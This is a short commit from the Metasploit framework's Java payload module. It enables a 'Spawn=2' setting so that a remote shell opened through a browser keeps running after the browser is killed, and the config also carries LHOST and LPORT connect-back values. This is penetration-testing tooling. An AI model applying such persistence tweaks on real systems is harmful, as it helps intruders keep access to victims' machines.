spawn out into another process so killing the browser won't drop our shell

git-svn-id: file:///home/svn/framework3/trunk@10091 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2010-08-21 06:28:29 +00:00
parent 56396a6d8b
commit eda50fc89e
1 changed files with 1 additions and 1 deletions

View File

@ -43,7 +43,7 @@ module Metasploit3
def generate_jar
config = ""
#config << "Spawn=2\n"
config << "Spawn=2\n"
config << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
config << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]